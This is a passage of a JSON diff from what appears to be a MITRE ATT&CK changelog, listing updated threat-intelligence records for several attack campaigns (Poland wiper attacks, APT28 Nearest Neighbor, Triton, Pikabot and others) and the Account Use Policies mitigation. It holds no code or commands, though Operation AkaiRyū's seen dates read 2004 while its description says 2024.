+                    "previous_version": "3.0"
+                }
+            ],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        },
+        "campaigns": {
+            "additions": [],
+            "major_version_changes": [],
+            "minor_version_changes": [],
+            "other_version_changes": [],
+            "patches": [
+                {
+                    "type": "campaign",
+                    "id": "campaign--a6aba167-5ada-4812-9da1-912c0e73335d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-22 19:33:22.532000+00:00",
+                    "modified": "2026-05-12 15:12:00.730000+00:00",
+                    "name": "2025 Poland Wiper Attacks",
+                    "description": "[2025 Poland Wiper Attacks](https://attack.mitre.org/campaigns/C0063) is a Russian state-sponsored campaign that conducted destructive cyberattacks against Polish energy infrastructure in December 2025. Targets included more than 30 wind and photovoltaic farms, a combined heat and power (CHP) plant, and a manufacturing sector company. The attacks on the distributed energy resources (DER) disrupted communications between affected facilities and the distribution system operator, but did not impact electricity generation or heat supply. Across the campaign, threat actors deployed two previously undocumented wiper tools, [DynoWiper](https://attack.mitre.org/software/S9038), a Windows-based wiper and [LazyWiper](https://attack.mitre.org/software/S9039), a PowerShell wiper, distributed via malicious Group Policy Objects. At the CHP plant, threat actors had maintained access since at least March 2025, using that foothold to obtain credentials and move laterally before attempting wiper deployment. Some reporting has assessed the activity to be consistent with Russian Federal Security Service (FSB) threat activity group [Dragonfly](https://attack.mitre.org/groups/G0035), also tracked as STATIC TUNDRA, while other reporting attributes the destructive wiper activities to the Russian General Staff Main Intelligence Directorate (GRU) threat activity group ELECTRUM, also tracked as [Sandworm Team](https://attack.mitre.org/groups/G0034).(Citation: CERT Polska)(Citation: Dragos ELECTRUM JAN 2026)(Citation: ESET DynoWiper JAN 2026)(Citation: ESET DynoWiper Update JAN 2026)",
+                    "aliases": [
+                        "2025 Poland Wiper Attacks",
+                        "2025 Poland Wiper Campaign"
+                    ],
+                    "first_seen": "2025-03-01 05:00:00+00:00",
+                    "last_seen": "2025-12-01 05:00:00+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/campaigns/C0063",
+                            "external_id": "C0063"
+                        },
+                        {
+                            "source_name": "CERT Polska",
+                            "description": "CERT Polska. (2026, January 30). Energy Sector Incident  Report \u2013 29 December. Retrieved April 22, 2026.",
+                            "url": "https://cert.pl/uploads/docs/CERT_Polska_Energy_Sector_Incident_Report_2025.pdf"
+                        },
+                        {
+                            "source_name": "ESET DynoWiper Update JAN 2026",
+                            "description": "ESET. (2026, January 30). DynoWiper update: Technical analysis and attribution. Retrieved April 22, 2026.",
+                            "url": "https://www.welivesecurity.com/en/eset-research/dynowiper-update-technical-analysis-attribution/"
+                        },
+                        {
+                            "source_name": "ESET DynoWiper JAN 2026",
+                            "description": "ESET. (2026, January 30). Russian Sandworm group attacks energy company in Poland with DynoWiper, ESET Research discovers. Retrieved April 22, 2026.",
+                            "url": "https://www.eset.com/us/about/newsroom/research/eset-research-russian-sandwormapt-attacks-energy-company-poland-with-dynowiper/"
+                        },
+                        {
+                            "source_name": "Dragos ELECTRUM JAN 2026",
+                            "description": "https://5943619.hs-sites.com/hubfs/Reports/dragos-2025-poland-attack-report.pdf. (2026, January). ELECTRUM: CYBER ATTACK ON POLAND\u2019S ELECTRIC SYSTEM 2025. Retrieved April 22, 2026.",
+                            "url": "https://5943619.hs-sites.com/hubfs/Reports/dragos-2025-poland-attack-report.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Dragos Threat Intelligence"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "ics-attack"
+                    ],
+                    "x_mitre_first_seen_citation": "(Citation: CERT Polska)(Citation: Dragos ELECTRUM JAN 2026)",
+                    "x_mitre_last_seen_citation": "(Citation: CERT Polska)(Citation: Dragos ELECTRUM JAN 2026)",
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_domains']\": [\"enterprise-attack\", \"ics-attack\"]}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.730000+00:00\", \"old_value\": \"2026-04-23 23:21:30.984000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "campaign",
+                    "id": "campaign--a010610e-22cb-437e-bfde-b78861bdca7a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-02-25 17:11:53.066000+00:00",
+                    "modified": "2026-05-12 15:12:00.730000+00:00",
+                    "name": "APT28 Nearest Neighbor Campaign",
+                    "description": "[APT28 Nearest Neighbor Campaign](https://attack.mitre.org/campaigns/C0051) was conducted by [APT28](https://attack.mitre.org/groups/G0007) from early February 2022 to November 2024 against organizations and individuals with expertise on Ukraine. APT28 primarily leveraged living-off-the-land techniques, while leveraging the zero-day exploitation of CVE-2022-38028. Notably, APT28 leveraged Wi-Fi networks in close proximity to the intended target to gain initial access to the victim environment. By daisy-chaining multiple compromised organizations nearby the intended target, APT28 discovered dual-homed systems (with both a wired and wireless network connection) to enable Wi-Fi and use compromised credentials to connect to the victim network.(Citation: Nearest Neighbor Volexity)",
+                    "aliases": [
+                        "APT28 Nearest Neighbor Campaign"
+                    ],
+                    "first_seen": "2022-02-01 05:00:00+00:00",
+                    "last_seen": "2024-11-01 04:00:00+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/campaigns/C0051",
+                            "external_id": "C0051"
+                        },
+                        {
+                            "source_name": "Nearest Neighbor Volexity",
+                            "description": "Koessel, Sean. Adair, Steven. Lancaster, Tom. (2024, November 22). The Nearest Neighbor Attack: How A Russian APT Weaponized Nearby Wi-Fi Networks for Covert Access. Retrieved February 25, 2025.",
+                            "url": "https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "x_mitre_first_seen_citation": "(Citation: Nearest Neighbor Volexity)",
+                    "x_mitre_last_seen_citation": "(Citation: Nearest Neighbor Volexity)",
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_domains']\": [\"enterprise-attack\", \"mobile-attack\"]}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.730000+00:00\", \"old_value\": \"2025-03-10 19:48:56.912000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "campaign",
+                    "id": "campaign--8a7c55ea-f363-4a03-b4c5-fa3fdb132d8f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-17 20:03:43.454000+00:00",
+                    "modified": "2026-05-12 15:12:00.730000+00:00",
+                    "name": "Operation AkaiRy\u016b",
+                    "description": "[Operation AkaiRy\u016b](https://attack.mitre.org/campaigns/C0060) (Japanese for RedDragon) was a cyberespionage spearphishing campaign conducted by [MirrorFace](https://attack.mitre.org/groups/G1054) between June and September 2024 against entities in Japan and Central Europe. [Operation AkaiRy\u016b](https://attack.mitre.org/campaigns/C0060) notably included the first reported targeting of a European entity by [MirrorFace](https://attack.mitre.org/groups/G1054), as well as their use of [UPPERCUT](https://attack.mitre.org/software/S0275), which was thought to be exclusive to [menuPass](https://attack.mitre.org/groups/G0045).(Citation: ESET MirrorFace 2025)(Citation: Trend Micro Earth Kasha Anel NOV 2024)",
+                    "aliases": [
+                        "Operation AkaiRy\u016b",
+                        "AkaiRy\u016b"
+                    ],
+                    "first_seen": "2004-06-01 04:00:00+00:00",
+                    "last_seen": "2004-09-01 04:00:00+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/campaigns/C0060",
+                            "external_id": "C0060"
+                        },
+                        {
+                            "source_name": "ESET MirrorFace 2025",
+                            "description": " Dominik Breitenbacher. (2025, March 18). Operation AkaiRy\u016b: MirrorFace invites Europe to Expo 2025 and revives ANEL backdoor. Retrieved May 22, 2025.",
+                            "url": "https://www.welivesecurity.com/en/eset-research/operation-akairyu-mirrorface-invites-europe-expo-2025-revives-anel-backdoor/"
+                        },
+                        {
+                            "source_name": "Trend Micro Earth Kasha Anel NOV 2024",
+                            "description": "Hiroaki, H. (2024, November 26). Guess Who\u2019s Back - The Return of ANEL in the Recent Earth Kasha Spear-phishing Campaign in 2024. Retrieved April 17, 2026.",
+                            "url": "https://www.trendmicro.com/en_us/research/24/k/return-of-anel-in-the-recent-earth-kasha-spearphishing-campaign.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Dominik Breitenbacher, ESET"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_first_seen_citation": "(Citation: ESET MirrorFace 2025)(Citation: Trend Micro Earth Kasha Anel NOV 2024)",
+                    "x_mitre_last_seen_citation": "(Citation: ESET MirrorFace 2025)",
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_domains']\": [\"enterprise-attack\"]}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.730000+00:00\", \"old_value\": \"2026-04-24 02:25:15.505000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "campaign",
+                    "id": "campaign--4c840263-bbda-440d-a22b-674679ddebf1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-09-16 15:32:41.893000+00:00",
+                    "modified": "2026-05-12 15:12:00.730000+00:00",
+                    "name": "Operation Spalax",
+                    "description": "[Operation Spalax](https://attack.mitre.org/campaigns/C0005) was a campaign that primarily targeted Colombian government organizations and private companies, particularly those associated with the energy and metallurgical industries. The [Operation Spalax](https://attack.mitre.org/campaigns/C0005) threat actors distributed commodity malware and tools using generic phishing topics related to COVID-19, banking, and law enforcement action. Security researchers noted indicators of compromise and some infrastructure overlaps with other campaigns dating back to April 2018, including at least one separately attributed to [APT-C-36](https://attack.mitre.org/groups/G0099), however identified enough differences to report this as separate, unattributed activity.(Citation: ESET Operation Spalax Jan 2021)  ",
+                    "aliases": [
+                        "Operation Spalax"
+                    ],
+                    "first_seen": "2019-11-01 05:00:00+00:00",
+                    "last_seen": "2021-01-01 06:00:00+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/campaigns/C0005",
+                            "external_id": "C0005"
+                        },
+                        {
+                            "source_name": "ESET Operation Spalax Jan 2021",
+                            "description": "M. Porolli. (2021, January 21). Operation Spalax: Targeted malware attacks in Colombia. Retrieved September 16, 2022.",
+                            "url": "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_first_seen_citation": "(Citation: ESET Operation Spalax Jan 2021)",
+                    "x_mitre_last_seen_citation": "(Citation: ESET Operation Spalax Jan 2021)",
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_domains']\": [\"enterprise-attack\"]}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.730000+00:00\", \"old_value\": \"2024-04-11 00:29:32.199000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "campaign",
+                    "id": "campaign--b03d5112-e23a-4ac8-add0-be7502d24eff",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-09-27 14:15:23.984000+00:00",
+                    "modified": "2026-05-12 15:12:00.730000+00:00",
+                    "name": "Operation Wocao",
+                    "description": "[Operation Wocao](https://attack.mitre.org/campaigns/C0014) was a cyber espionage campaign that targeted organizations around the world, including in Brazil, China, France, Germany, Italy, Mexico, Portugal, Spain, the United Kingdom, and the United States. The suspected China-based actors compromised government organizations and managed service providers, as well as aviation, construction, energy, finance, health care, insurance, offshore engineering, software development, and transportation companies.(Citation: FoxIT Wocao December 2019)\n\nSecurity researchers assessed the [Operation Wocao](https://attack.mitre.org/campaigns/C0014) actors used similar TTPs and tools as APT20, suggesting a possible overlap. [Operation Wocao](https://attack.mitre.org/campaigns/C0014) was named after an observed command line entry by one of the threat actors, possibly out of frustration from losing webshell access.(Citation: FoxIT Wocao December 2019)",
+                    "aliases": [
+                        "Operation Wocao"
+                    ],
+                    "first_seen": "2017-12-01 05:00:00+00:00",
+                    "last_seen": "2019-12-01 05:00:00+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/campaigns/C0014",
+                            "external_id": "C0014"
+                        },
+                        {
+                            "source_name": "FoxIT Wocao December 2019",
+                            "description": "Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China\u2019s hidden hacking groups. Retrieved October 8, 2020.",
+                            "url": "https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Erik Schamper, @Schamperr, Fox-IT",
+                        "Maarten van Dantzig, @MaartenVDantzig, Fox-IT"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_first_seen_citation": "(Citation: FoxIT Wocao December 2019)",
+                    "x_mitre_last_seen_citation": "(Citation: FoxIT Wocao December 2019)",
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_domains']\": [\"enterprise-attack\"]}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.730000+00:00\", \"old_value\": \"2025-10-21 03:04:25.546000+00:00\"}}}",
+                    "previous_version": "1.2"
+                },
+                {
+                    "type": "campaign",
+                    "id": "campaign--35879bf3-0a21-4cc1-9e42-6de917a22501",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-06-24 15:14:52.789000+00:00",
+                    "modified": "2026-05-12 15:12:00.729000+00:00",
+                    "name": "RedPenguin",
+                    "description": "The [RedPenguin](https://attack.mitre.org/campaigns/C0056) project was launched by Juniper in July 2024 to investigate reported malware infections of Juniper MX Series routers. [RedPenguin](https://attack.mitre.org/campaigns/C0056) activity was separately attributed to [UNC3886](https://attack.mitre.org/groups/G1048) and included the deployment of multiple custom versions of the publicly-available TINYSHELL backdoor on Juniper routers.(Citation: Juniper RedPenguin MAR 2025)(Citation: Mandiant UNC3886 Juniper Routers MAR 2025)",
+                    "aliases": [
+                        "RedPenguin"
+                    ],
+                    "first_seen": "2024-07-01 04:00:00+00:00",
+                    "last_seen": "2025-03-01 05:00:00+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/campaigns/C0056",
+                            "external_id": "C0056"
+                        },
+                        {
+                            "source_name": "Juniper RedPenguin MAR 2025",
+                            "description": "Juniper Networks, Cybersecurity R&D. (2025, March 11). The RedPenguin Malware Incident. Retrieved June 24, 2025.",
+                            "url": "https://supportportal.juniper.net/sfc/servlet.shepherd/document/download/069Dp00000FzdmIIAR?operationContext=S1"
+                        },
+                        {
+                            "source_name": "Mandiant UNC3886 Juniper Routers MAR 2025",
+                            "description": "Lamparski, L. et al. (2025, March 11). Ghost in the Router: China-Nexus Espionage Actor UNC3886 Targets Juniper Routers. Retrieved June 24, 2025.",
+                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_first_seen_citation": "(Citation: Juniper RedPenguin MAR 2025)(Citation: Mandiant UNC3886 Juniper Routers MAR 2025)",
+                    "x_mitre_last_seen_citation": "(Citation: Juniper RedPenguin MAR 2025)(Citation: Mandiant UNC3886 Juniper Routers MAR 2025)",
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_domains']\": [\"enterprise-attack\"]}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.729000+00:00\", \"old_value\": \"2025-10-24 03:46:34.675000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "campaign",
+                    "id": "campaign--45a98f02-852f-49b2-94c0-c63207bebbbf",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2024-03-25 17:47:37.619000+00:00",
+                    "modified": "2026-05-12 15:12:00.729000+00:00",
+                    "name": "Triton Safety Instrumented System Attack",
+                    "description": "[Triton Safety Instrumented System Attack](https://attack.mitre.org/campaigns/C0030) was a campaign employed by [TEMP.Veles](https://attack.mitre.org/groups/G0088) which leveraged the [Triton](https://attack.mitre.org/software/S1009) malware framework against a petrochemical organization.(Citation: Triton-EENews-2017) The malware and techniques used within this campaign targeted specific Triconex [Safety Controller](https://attack.mitre.org/assets/A0010)s within the environment.(Citation: FireEye TRITON 2018) The incident was eventually discovered due to a safety trip that occurred as a result of an issue in the malware.(Citation: FireEye TRITON 2017)\n",
+                    "aliases": [
+                        "Triton Safety Instrumented System Attack"
+                    ],
+                    "first_seen": "2017-06-01 04:00:00+00:00",
+                    "last_seen": "2017-08-01 04:00:00+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/campaigns/C0030",
+                            "external_id": "C0030"
+                        },
+                        {
+                            "source_name": "Triton-EENews-2017",
+                            "description": "Blake Sobczak. (2019, March 7). The inside story of the world\u2019s most dangerous malware. Retrieved March 25, 2024.",
+                            "url": "https://www.eenews.net/articles/the-inside-story-of-the-worlds-most-dangerous-malware/"
+                        },
+                        {
+                            "source_name": "FireEye TRITON 2017",
+                            "description": "Johnson, B, et. al. (2017, December 14). Attackers Deploy New ICS Attack Framework \"TRITON\" and Cause Operational Disruption to Critical Infrastructure. Retrieved January 6, 2021.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html"
+                        },
+                        {
+                            "source_name": "FireEye TRITON 2018",
+                            "description": "Miller, S. Reese, E. (2018, June 7). A Totally Tubular Treatise on TRITON and TriStation. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20200618231942/https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-triton-and-tristation.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_first_seen_citation": "(Citation: Triton-EENews-2017)",
+                    "x_mitre_last_seen_citation": "(Citation: Triton-EENews-2017)",
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_domains']\": [\"ics-attack\", \"enterprise-attack\"]}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.729000+00:00\", \"old_value\": \"2026-04-23 00:24:57.457000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "campaign",
+                    "id": "campaign--57541e3b-657e-463a-a4ab-ca08d7ea9965",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2024-07-17 20:23:22.945000+00:00",
+                    "modified": "2026-05-12 15:12:00.730000+00:00",
+                    "name": "Water Curupira Pikabot Distribution",
+                    "description": "[Pikabot](https://attack.mitre.org/software/S1145) was distributed in [Water Curupira Pikabot Distribution](https://attack.mitre.org/campaigns/C0037) throughout 2023 by an entity linked to BlackBasta ransomware deployment via email attachments. This activity followed the take-down of [QakBot](https://attack.mitre.org/software/S0650), with several technical overlaps and similarities with [QakBot](https://attack.mitre.org/software/S0650), indicating a possible connection. The identified activity led to the deployment of tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154), while coinciding with campaigns delivering [DarkGate](https://attack.mitre.org/software/S1111) and [IcedID](https://attack.mitre.org/software/S0483) en route to ransomware deployment.(Citation: TrendMicro Pikabot 2024)",
+                    "aliases": [
+                        "Water Curupira Pikabot Distribution"
+                    ],
+                    "first_seen": "2023-01-01 05:00:00+00:00",
+                    "last_seen": "2023-12-01 05:00:00+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/campaigns/C0037",
+                            "external_id": "C0037"
+                        },
+                        {
+                            "source_name": "TrendMicro Pikabot 2024",
+                            "description": "Shinji Robert Arasawa, Joshua Aquino, Charles Steven Derion, Juhn Emmanuel Atanque, Francisrey Joshua Castillo, John Carlo Marquez, Henry Salcedo, John Rainier Navato, Arianne Dela Cruz, Raymart Yambot & Ian Kenefick. (2024, January 9). Black Basta-Affiliated Water Curupira\u2019s Pikabot Spam Campaign. Retrieved July 17, 2024.",
+                            "url": "https://www.trendmicro.com/en_us/research/24/a/a-look-into-pikabot-spam-wave-campaign.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Inna Danilevich, U.S. Bank"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_first_seen_citation": "(Citation: TrendMicro Pikabot 2024)",
+                    "x_mitre_last_seen_citation": "(Citation: TrendMicro Pikabot 2024)",
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_domains']\": [\"enterprise-attack\"]}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.730000+00:00\", \"old_value\": \"2026-04-22 18:11:30.378000+00:00\"}}}",
+                    "previous_version": "1.0"
+                }
+            ],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        },
+        "assets": {
+            "additions": [],
+            "major_version_changes": [],
+            "minor_version_changes": [],
+            "other_version_changes": [],
+            "patches": [],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        },
+        "mitigations": {
+            "additions": [],
+            "major_version_changes": [],
+            "minor_version_changes": [],
+            "other_version_changes": [],
+            "patches": [
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--f9f9e6ef-bc0a-41ad-ba11-0924e5e84c4c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-06-11 16:32:21.854000+00:00",
+                    "modified": "2026-05-12 15:12:00.731000+00:00",
+                    "name": "Account Use Policies",
+                    "description": "Account Use Policies help mitigate unauthorized access by configuring and enforcing rules that govern how and when accounts can be used. These policies include enforcing account lockout mechanisms, restricting login times, and setting inactivity timeouts. Proper configuration of these policies reduces the risk of brute-force attacks, credential theft, and unauthorized access by limiting the opportunities for malicious actors to exploit accounts. This mitigation can be implemented through the following measures:\n\nAccount Lockout Policies:\n\n- Implementation: Configure account lockout settings so that after a defined number of failed login attempts (e.g., 3-5 attempts), the account is locked for a specific time period (e.g., 15 minutes) or requires an administrator to unlock it.\n- Use Case: This prevents brute-force attacks by limiting how many incorrect password attempts can be made before the account is temporarily disabled, reducing the likelihood of an attacker successfully guessing a password.\n\nLogin Time Restrictions:\n\n- Implementation: Set up login time policies to restrict when users or groups can log into systems. For example, only allowing login during standard business hours (e.g., 8 AM to 6 PM) for non-administrative accounts.\n- Use Case: This prevents unauthorized access outside of approved working hours, where login attempts might be more suspicious or harder to monitor. For example, if an account that is only supposed to be active during the day logs in at 2 AM, it should raise an alert or be blocked.\n\nInactivity Timeout and Session Termination:\n\n- Implementation: Enforce session timeouts after a period of inactivity (e.g., 10-15 minutes) and require users to re-authenticate if they wish to resume the session.\n- Use Case: This policy prevents attackers from hijacking active sessions left unattended. For example, if an employee walks away from their computer without locking it, an attacker with physical access to the system would be unable to exploit the session.\n\nPassword Aging Policies:\n\n- Implementation: Enforce password aging rules, requiring users to change their passwords after a defined period (e.g., 90 days) and ensure passwords are not reused by maintaining a password history.\n- Use Case: This limits the risk of compromised passwords being used indefinitely. Regular password changes make it more difficult for attackers to reuse stolen credentials.\n\nAccount Expiration and Deactivation:\n\n- Implementation: Configure user accounts, especially for temporary or contract workers, to automatically expire after a set date or event. Accounts that remain unused for a specific period should be deactivated automatically.\n- Use Case: This prevents dormant accounts from becoming an attack vector. For example, an attacker can exploit unused accounts if they are not properly monitored or deactivated.\n\n**Tools for Implementation**:\n\n- Group Policy Objects (GPOs) in Windows: To enforce account lockout thresholds, login time restrictions, session timeouts, and password policies.\n- Identity and Access Management (IAM) solutions: For centralized management of user accounts, session policies, and automated deactivation of accounts.\n- Security Information and Event Management (SIEM) platforms: To monitor and alert on unusual login activity, such as failed logins or out-of-hours access attempts.\n- Multi-Factor Authentication (MFA) Tools: To further enforce secure login attempts, preventing brute-force or credential stuffing attacks.\n",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M1036",
+                            "external_id": "M1036"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.731000+00:00\", \"old_value\": \"2024-12-10 15:55:53.913000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--cc2399fd-3cd3-4319-8d0a-fbd6420cdaf8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-06-11 17:06:14.029000+00:00",
+                    "modified": "2026-05-12 15:12:00.731000+00:00",
+                    "name": "Audit",
